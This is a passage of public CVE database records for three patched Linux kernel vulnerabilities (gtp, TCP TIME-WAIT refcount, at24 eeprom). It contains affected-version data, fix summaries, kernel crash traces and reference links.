},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/3963f16cc7643b461271989b712329520374ad2a"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/ba6b8b02a3314e62571a540efa96560888c5f03e"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/5013bd54d283eda5262c9ae3bcc966d01daf8576"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/136cfaca22567a03bbb3bf53a43d8cb5748b80ec"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00020.html"
}
],
"title": "CVE Program Container"
},
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-26754",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-09-10T15:51:37.587111Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-09-11T17:33:15.622Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"drivers/net/gtp.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "f0ecdfa679189d26aedfe24212d4e69e42c2c861",
"status": "affected",
"version": "459aa660eb1d8ce67080da1983bb81d716aa5a69",
"versionType": "git"
},
{
"lessThan": "f8cbd1791900b5d96466eede8e9439a5b9ca4de7",
"status": "affected",
"version": "459aa660eb1d8ce67080da1983bb81d716aa5a69",
"versionType": "git"
},
{
"lessThan": "2e534fd15e5c2ca15821c897352cf0e8a3e30dca",
"status": "affected",
"version": "459aa660eb1d8ce67080da1983bb81d716aa5a69",
"versionType": "git"
},
{
"lessThan": "a576308800be28f2eaa099e7caad093b97d66e77",
"status": "affected",
"version": "459aa660eb1d8ce67080da1983bb81d716aa5a69",
"versionType": "git"
},
{
"lessThan": "3963f16cc7643b461271989b712329520374ad2a",
"status": "affected",
"version": "459aa660eb1d8ce67080da1983bb81d716aa5a69",
"versionType": "git"
},
{
"lessThan": "ba6b8b02a3314e62571a540efa96560888c5f03e",
"status": "affected",
"version": "459aa660eb1d8ce67080da1983bb81d716aa5a69",
"versionType": "git"
},
{
"lessThan": "5013bd54d283eda5262c9ae3bcc966d01daf8576",
"status": "affected",
"version": "459aa660eb1d8ce67080da1983bb81d716aa5a69",
"versionType": "git"
},
{
"lessThan": "136cfaca22567a03bbb3bf53a43d8cb5748b80ec",
"status": "affected",
"version": "459aa660eb1d8ce67080da1983bb81d716aa5a69",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"drivers/net/gtp.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "4.7"
},
{
"lessThan": "4.7",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "4.19.*",
"status": "unaffected",
"version": "4.19.308",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.4.*",
"status": "unaffected",
"version": "5.4.270",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.211",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.150",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.80",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.19",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.7.*",
"status": "unaffected",
"version": "6.7.7",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.8",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "4.19.308",
"versionStartIncluding": "4.7",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.4.270",
"versionStartIncluding": "4.7",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.211",
"versionStartIncluding": "4.7",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.150",
"versionStartIncluding": "4.7",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.80",
"versionStartIncluding": "4.7",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.19",
"versionStartIncluding": "4.7",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.7.7",
"versionStartIncluding": "4.7",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.8",
"versionStartIncluding": "4.7",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\ngtp: fix use-after-free and null-ptr-deref in gtp_genl_dump_pdp()\n\nThe gtp_net_ops pernet operations structure for the subsystem must be\nregistered before registering the generic netlink family.\n\nSyzkaller hit \u0027general protection fault in gtp_genl_dump_pdp\u0027 bug:\n\ngeneral protection fault, probably for non-canonical address\n0xdffffc0000000002: 0000 [#1] PREEMPT SMP KASAN NOPTI\nKASAN: null-ptr-deref in range [0x0000000000000010-0x0000000000000017]\nCPU: 1 PID: 5826 Comm: gtp Not tainted 6.8.0-rc3-std-def-alt1 #1\nHardware name: QEMU Standard PC (Q35 + ICH9, 2009), BIOS 1.16.0-alt1 04/01/2014\nRIP: 0010:gtp_genl_dump_pdp+0x1be/0x800 [gtp]\nCode: c6 89 c6 e8 64 e9 86 df 58 45 85 f6 0f 85 4e 04 00 00 e8 c5 ee 86\n df 48 8b 54 24 18 48 b8 00 00 00 00 00 fc ff df 48 c1 ea 03 \u003c80\u003e\n 3c 02 00 0f 85 de 05 00 00 48 8b 44 24 18 4c 8b 30 4c 39 f0 74\nRSP: 0018:ffff888014107220 EFLAGS: 00010202\nRAX: dffffc0000000000 RBX: 0000000000000000 RCX: 0000000000000000\nRDX: 0000000000000002 RSI: 0000000000000000 RDI: 0000000000000000\nRBP: 0000000000000000 R08: 0000000000000000 R09: 0000000000000000\nR10: 0000000000000000 R11: 0000000000000000 R12: 0000000000000000\nR13: ffff88800fcda588 R14: 0000000000000001 R15: 0000000000000000\nFS: 00007f1be4eb05c0(0000) GS:ffff88806ce80000(0000) knlGS:0000000000000000\nCS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033\nCR2: 00007f1be4e766cf CR3: 000000000c33e000 CR4: 0000000000750ef0\nPKRU: 55555554\nCall Trace:\n \u003cTASK\u003e\n ? show_regs+0x90/0xa0\n ? die_addr+0x50/0xd0\n ? exc_general_protection+0x148/0x220\n ? asm_exc_general_protection+0x22/0x30\n ? gtp_genl_dump_pdp+0x1be/0x800 [gtp]\n ? __alloc_skb+0x1dd/0x350\n ? __pfx___alloc_skb+0x10/0x10\n genl_dumpit+0x11d/0x230\n netlink_dump+0x5b9/0xce0\n ? lockdep_hardirqs_on_prepare+0x253/0x430\n ? __pfx_netlink_dump+0x10/0x10\n ? kasan_save_track+0x10/0x40\n ? __kasan_kmalloc+0x9b/0xa0\n ? genl_start+0x675/0x970\n __netlink_dump_start+0x6fc/0x9f0\n genl_family_rcv_msg_dumpit+0x1bb/0x2d0\n ? __pfx_genl_family_rcv_msg_dumpit+0x10/0x10\n ? genl_op_from_small+0x2a/0x440\n ? cap_capable+0x1d0/0x240\n ? __pfx_genl_start+0x10/0x10\n ? __pfx_genl_dumpit+0x10/0x10\n ? __pfx_genl_done+0x10/0x10\n ? security_capable+0x9d/0xe0"
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T08:55:45.919Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/f0ecdfa679189d26aedfe24212d4e69e42c2c861"
},
{
"url": "https://git.kernel.org/stable/c/f8cbd1791900b5d96466eede8e9439a5b9ca4de7"
},
{
"url": "https://git.kernel.org/stable/c/2e534fd15e5c2ca15821c897352cf0e8a3e30dca"
},
{
"url": "https://git.kernel.org/stable/c/a576308800be28f2eaa099e7caad093b97d66e77"
},
{
"url": "https://git.kernel.org/stable/c/3963f16cc7643b461271989b712329520374ad2a"
},
{
"url": "https://git.kernel.org/stable/c/ba6b8b02a3314e62571a540efa96560888c5f03e"
},
{
"url": "https://git.kernel.org/stable/c/5013bd54d283eda5262c9ae3bcc966d01daf8576"
},
{
"url": "https://git.kernel.org/stable/c/136cfaca22567a03bbb3bf53a43d8cb5748b80ec"
}
],
"title": "gtp: fix use-after-free and null-ptr-deref in gtp_genl_dump_pdp()",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-26754",
"datePublished": "2024-04-03T17:00:39.079Z",
"dateReserved": "2024-02-19T14:20:24.170Z",
"dateUpdated": "2025-05-04T08:55:45.919Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-36904 (GCVE-0-2024-36904)
Vulnerability from cvelistv5
Published
2024-05-30 15:29
Modified
2025-05-04 09:11
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
tcp: Use refcount_inc_not_zero() in tcp_twsk_unique().
Anderson Nascimento reported a use-after-free splat in tcp_twsk_unique()
with nice analysis.
Since commit ec94c2696f0b ("tcp/dccp: avoid one atomic operation for
timewait hashdance"), inet_twsk_hashdance() sets TIME-WAIT socket's
sk_refcnt after putting it into ehash and releasing the bucket lock.
Thus, there is a small race window where other threads could try to
reuse the port during connect() and call sock_hold() in tcp_twsk_unique()
for the TIME-WAIT socket with zero refcnt.
If that happens, the refcnt taken by tcp_twsk_unique() is overwritten
and sock_put() will cause underflow, triggering a real use-after-free
somewhere else.
To avoid the use-after-free, we need to use refcount_inc_not_zero() in
tcp_twsk_unique() and give up on reusing the port if it returns false.
[0]:
refcount_t: addition on 0; use-after-free.
WARNING: CPU: 0 PID: 1039313 at lib/refcount.c:25 refcount_warn_saturate+0xe5/0x110
CPU: 0 PID: 1039313 Comm: trigger Not tainted 6.8.6-200.fc39.x86_64 #1
Hardware name: VMware, Inc. VMware20,1/440BX Desktop Reference Platform, BIOS VMW201.00V.21805430.B64.2305221830 05/22/2023
RIP: 0010:refcount_warn_saturate+0xe5/0x110
Code: 42 8e ff 0f 0b c3 cc cc cc cc 80 3d aa 13 ea 01 00 0f 85 5e ff ff ff 48 c7 c7 f8 8e b7 82 c6 05 96 13 ea 01 01 e8 7b 42 8e ff <0f> 0b c3 cc cc cc cc 48 c7 c7 50 8f b7 82 c6 05 7a 13 ea 01 01 e8
RSP: 0018:ffffc90006b43b60 EFLAGS: 00010282
RAX: 0000000000000000 RBX: ffff888009bb3ef0 RCX: 0000000000000027
RDX: ffff88807be218c8 RSI: 0000000000000001 RDI: ffff88807be218c0
RBP: 0000000000069d70 R08: 0000000000000000 R09: ffffc90006b439f0
R10: ffffc90006b439e8 R11: 0000000000000003 R12: ffff8880029ede84
R13: 0000000000004e20 R14: ffffffff84356dc0 R15: ffff888009bb3ef0
FS: 00007f62c10926c0(0000) GS:ffff88807be00000(0000) knlGS:0000000000000000
CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033
CR2: 0000000020ccb000 CR3: 000000004628c005 CR4: 0000000000f70ef0
PKRU: 55555554
Call Trace:
<TASK>
? refcount_warn_saturate+0xe5/0x110
? __warn+0x81/0x130
? refcount_warn_saturate+0xe5/0x110
? report_bug+0x171/0x1a0
? refcount_warn_saturate+0xe5/0x110
? handle_bug+0x3c/0x80
? exc_invalid_op+0x17/0x70
? asm_exc_invalid_op+0x1a/0x20
? refcount_warn_saturate+0xe5/0x110
tcp_twsk_unique+0x186/0x190
__inet_check_established+0x176/0x2d0
__inet_hash_connect+0x74/0x7d0
? __pfx___inet_check_established+0x10/0x10
tcp_v4_connect+0x278/0x530
__inet_stream_connect+0x10f/0x3d0
inet_stream_connect+0x3a/0x60
__sys_connect+0xa8/0xd0
__x64_sys_connect+0x18/0x20
do_syscall_64+0x83/0x170
entry_SYSCALL_64_after_hwframe+0x78/0x80
RIP: 0033:0x7f62c11a885d
Code: ff c3 66 2e 0f 1f 84 00 00 00 00 00 90 f3 0f 1e fa 48 89 f8 48 89 f7 48 89 d6 48 89 ca 4d 89 c2 4d 89 c8 4c 8b 4c 24 08 0f 05 <48> 3d 01 f0 ff ff 73 01 c3 48 8b 0d a3 45 0c 00 f7 d8 64 89 01 48
RSP: 002b:00007f62c1091e58 EFLAGS: 00000296 ORIG_RAX: 000000000000002a
RAX: ffffffffffffffda RBX: 0000000020ccb004 RCX: 00007f62c11a885d
RDX: 0000000000000010 RSI: 0000000020ccb000 RDI: 0000000000000003
RBP: 00007f62c1091e90 R08: 0000000000000000 R09: 0000000000000000
R10: 0000000000000000 R11: 0000000000000296 R12: 00007f62c10926c0
R13: ffffffffffffff88 R14: 0000000000000000 R15: 00007ffe237885b0
</TASK>
References
| URL | Tags | |||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: ec94c2696f0bcd5ae92a553244e4ac30d2171a2d Version: ec94c2696f0bcd5ae92a553244e4ac30d2171a2d Version: ec94c2696f0bcd5ae92a553244e4ac30d2171a2d Version: ec94c2696f0bcd5ae92a553244e4ac30d2171a2d Version: ec94c2696f0bcd5ae92a553244e4ac30d2171a2d Version: ec94c2696f0bcd5ae92a553244e4ac30d2171a2d Version: ec94c2696f0bcd5ae92a553244e4ac30d2171a2d Version: ec94c2696f0bcd5ae92a553244e4ac30d2171a2d |
||
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-36904",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-06-12T19:20:22.181493Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-06-12T19:20:38.310Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
},
{
"providerMetadata": {
"dateUpdated": "2024-09-05T08:03:30.442Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/84546cc1aeeb4df3e444b18a4293c9823f974be9"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/1796ca9c6f5bd50554214053af5f47d112818ee3"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/1d9cf07810c30ef7948879567d10fd1f01121d34"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/27b0284d8be182a81feb65581ab6a724dfd596e8"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/13ed7cdf079686ccd3618335205700c03f6fb446"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/6e48faad92be13166184d21506e4e54c79c13adc"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/517e32ea0a8c72202d0d8aa8df50a7cd3d6fdefc"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/f2db7230f73a80dbb179deab78f88a7947f0ab7e"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00020.html"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00019.html"
},
{
"url": "https://security.netapp.com/advisory/ntap-20240905-0004/"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"net/ipv4/tcp_ipv4.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "84546cc1aeeb4df3e444b18a4293c9823f974be9",
"status": "affected",
"version": "ec94c2696f0bcd5ae92a553244e4ac30d2171a2d",
"versionType": "git"
},
{
"lessThan": "1796ca9c6f5bd50554214053af5f47d112818ee3",
"status": "affected",
"version": "ec94c2696f0bcd5ae92a553244e4ac30d2171a2d",
"versionType": "git"
},
{
"lessThan": "1d9cf07810c30ef7948879567d10fd1f01121d34",
"status": "affected",
"version": "ec94c2696f0bcd5ae92a553244e4ac30d2171a2d",
"versionType": "git"
},
{
"lessThan": "27b0284d8be182a81feb65581ab6a724dfd596e8",
"status": "affected",
"version": "ec94c2696f0bcd5ae92a553244e4ac30d2171a2d",
"versionType": "git"
},
{
"lessThan": "13ed7cdf079686ccd3618335205700c03f6fb446",
"status": "affected",
"version": "ec94c2696f0bcd5ae92a553244e4ac30d2171a2d",
"versionType": "git"
},
{
"lessThan": "6e48faad92be13166184d21506e4e54c79c13adc",
"status": "affected",
"version": "ec94c2696f0bcd5ae92a553244e4ac30d2171a2d",
"versionType": "git"
},
{
"lessThan": "517e32ea0a8c72202d0d8aa8df50a7cd3d6fdefc",
"status": "affected",
"version": "ec94c2696f0bcd5ae92a553244e4ac30d2171a2d",
"versionType": "git"
},
{
"lessThan": "f2db7230f73a80dbb179deab78f88a7947f0ab7e",
"status": "affected",
"version": "ec94c2696f0bcd5ae92a553244e4ac30d2171a2d",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"net/ipv4/tcp_ipv4.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "4.16"
},
{
"lessThan": "4.16",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "4.19.*",
"status": "unaffected",
"version": "4.19.314",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.4.*",
"status": "unaffected",
"version": "5.4.276",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.217",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.159",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.91",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.31",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.8.*",
"status": "unaffected",
"version": "6.8.10",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.9",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "4.19.314",
"versionStartIncluding": "4.16",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.4.276",
"versionStartIncluding": "4.16",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.217",
"versionStartIncluding": "4.16",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.159",
"versionStartIncluding": "4.16",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.91",
"versionStartIncluding": "4.16",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.31",
"versionStartIncluding": "4.16",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.8.10",
"versionStartIncluding": "4.16",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.9",
"versionStartIncluding": "4.16",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\ntcp: Use refcount_inc_not_zero() in tcp_twsk_unique().\n\nAnderson Nascimento reported a use-after-free splat in tcp_twsk_unique()\nwith nice analysis.\n\nSince commit ec94c2696f0b (\"tcp/dccp: avoid one atomic operation for\ntimewait hashdance\"), inet_twsk_hashdance() sets TIME-WAIT socket\u0027s\nsk_refcnt after putting it into ehash and releasing the bucket lock.\n\nThus, there is a small race window where other threads could try to\nreuse the port during connect() and call sock_hold() in tcp_twsk_unique()\nfor the TIME-WAIT socket with zero refcnt.\n\nIf that happens, the refcnt taken by tcp_twsk_unique() is overwritten\nand sock_put() will cause underflow, triggering a real use-after-free\nsomewhere else.\n\nTo avoid the use-after-free, we need to use refcount_inc_not_zero() in\ntcp_twsk_unique() and give up on reusing the port if it returns false.\n\n[0]:\nrefcount_t: addition on 0; use-after-free.\nWARNING: CPU: 0 PID: 1039313 at lib/refcount.c:25 refcount_warn_saturate+0xe5/0x110\nCPU: 0 PID: 1039313 Comm: trigger Not tainted 6.8.6-200.fc39.x86_64 #1\nHardware name: VMware, Inc. VMware20,1/440BX Desktop Reference Platform, BIOS VMW201.00V.21805430.B64.2305221830 05/22/2023\nRIP: 0010:refcount_warn_saturate+0xe5/0x110\nCode: 42 8e ff 0f 0b c3 cc cc cc cc 80 3d aa 13 ea 01 00 0f 85 5e ff ff ff 48 c7 c7 f8 8e b7 82 c6 05 96 13 ea 01 01 e8 7b 42 8e ff \u003c0f\u003e 0b c3 cc cc cc cc 48 c7 c7 50 8f b7 82 c6 05 7a 13 ea 01 01 e8\nRSP: 0018:ffffc90006b43b60 EFLAGS: 00010282\nRAX: 0000000000000000 RBX: ffff888009bb3ef0 RCX: 0000000000000027\nRDX: ffff88807be218c8 RSI: 0000000000000001 RDI: ffff88807be218c0\nRBP: 0000000000069d70 R08: 0000000000000000 R09: ffffc90006b439f0\nR10: ffffc90006b439e8 R11: 0000000000000003 R12: ffff8880029ede84\nR13: 0000000000004e20 R14: ffffffff84356dc0 R15: ffff888009bb3ef0\nFS: 00007f62c10926c0(0000) GS:ffff88807be00000(0000) knlGS:0000000000000000\nCS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033\nCR2: 0000000020ccb000 CR3: 000000004628c005 CR4: 0000000000f70ef0\nPKRU: 55555554\nCall Trace:\n \u003cTASK\u003e\n ? refcount_warn_saturate+0xe5/0x110\n ? __warn+0x81/0x130\n ? refcount_warn_saturate+0xe5/0x110\n ? report_bug+0x171/0x1a0\n ? refcount_warn_saturate+0xe5/0x110\n ? handle_bug+0x3c/0x80\n ? exc_invalid_op+0x17/0x70\n ? asm_exc_invalid_op+0x1a/0x20\n ? refcount_warn_saturate+0xe5/0x110\n tcp_twsk_unique+0x186/0x190\n __inet_check_established+0x176/0x2d0\n __inet_hash_connect+0x74/0x7d0\n ? __pfx___inet_check_established+0x10/0x10\n tcp_v4_connect+0x278/0x530\n __inet_stream_connect+0x10f/0x3d0\n inet_stream_connect+0x3a/0x60\n __sys_connect+0xa8/0xd0\n __x64_sys_connect+0x18/0x20\n do_syscall_64+0x83/0x170\n entry_SYSCALL_64_after_hwframe+0x78/0x80\nRIP: 0033:0x7f62c11a885d\nCode: ff c3 66 2e 0f 1f 84 00 00 00 00 00 90 f3 0f 1e fa 48 89 f8 48 89 f7 48 89 d6 48 89 ca 4d 89 c2 4d 89 c8 4c 8b 4c 24 08 0f 05 \u003c48\u003e 3d 01 f0 ff ff 73 01 c3 48 8b 0d a3 45 0c 00 f7 d8 64 89 01 48\nRSP: 002b:00007f62c1091e58 EFLAGS: 00000296 ORIG_RAX: 000000000000002a\nRAX: ffffffffffffffda RBX: 0000000020ccb004 RCX: 00007f62c11a885d\nRDX: 0000000000000010 RSI: 0000000020ccb000 RDI: 0000000000000003\nRBP: 00007f62c1091e90 R08: 0000000000000000 R09: 0000000000000000\nR10: 0000000000000000 R11: 0000000000000296 R12: 00007f62c10926c0\nR13: ffffffffffffff88 R14: 0000000000000000 R15: 00007ffe237885b0\n \u003c/TASK\u003e"
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T09:11:46.007Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/84546cc1aeeb4df3e444b18a4293c9823f974be9"
},
{
"url": "https://git.kernel.org/stable/c/1796ca9c6f5bd50554214053af5f47d112818ee3"
},
{
"url": "https://git.kernel.org/stable/c/1d9cf07810c30ef7948879567d10fd1f01121d34"
},
{
"url": "https://git.kernel.org/stable/c/27b0284d8be182a81feb65581ab6a724dfd596e8"
},
{
"url": "https://git.kernel.org/stable/c/13ed7cdf079686ccd3618335205700c03f6fb446"
},
{
"url": "https://git.kernel.org/stable/c/6e48faad92be13166184d21506e4e54c79c13adc"
},
{
"url": "https://git.kernel.org/stable/c/517e32ea0a8c72202d0d8aa8df50a7cd3d6fdefc"
},
{
"url": "https://git.kernel.org/stable/c/f2db7230f73a80dbb179deab78f88a7947f0ab7e"
}
],
"title": "tcp: Use refcount_inc_not_zero() in tcp_twsk_unique().",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-36904",
"datePublished": "2024-05-30T15:29:05.457Z",
"dateReserved": "2024-05-30T15:25:07.067Z",
"dateUpdated": "2025-05-04T09:11:46.007Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-35848 (GCVE-0-2024-35848)
Vulnerability from cvelistv5
Published
2024-05-17 14:47
Modified
2025-05-04 09:06
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
eeprom: at24: fix memory corruption race condition
If the eeprom is not accessible, an nvmem device will be registered, the
read will fail, and the device will be torn down. If another driver
accesses the nvmem device after the teardown, it will reference
invalid memory.
Move the failure point before registering the nvmem device.
References
| URL | Tags | |||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: b20eb4c1f0261eebe6e1b9221c0d6e4048837778 Version: b20eb4c1f0261eebe6e1b9221c0d6e4048837778 Version: b20eb4c1f0261eebe6e1b9221c0d6e4048837778 Version: b20eb4c1f0261eebe6e1b9221c0d6e4048837778 Version: b20eb4c1f0261eebe6e1b9221c0d6e4048837778 Version: b20eb4c1f0261eebe6e1b9221c0d6e4048837778 |
||
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-35848",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-05-17T17:15:51.983063Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-06-04T17:34:04.173Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
},
{
"providerMetadata": {
"dateUpdated": "2024-08-02T03:21:48.632Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/c850f71fca09ea41800ed55905980063d17e01da"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/26d32bec4c6d255a03762f33c637bfa3718be15a"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/c43e5028f5a35331eb25017f5ff6cc21735005c6"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/2af84c46b9b8f2d6c0f88d09ee5c849ae1734676"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/6d8b56ec0c8f30d5657382f47344a32569f7a9bc"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/f42c97027fb75776e2e9358d16bf4a99aeb04cf2"
},
{
"tags": [
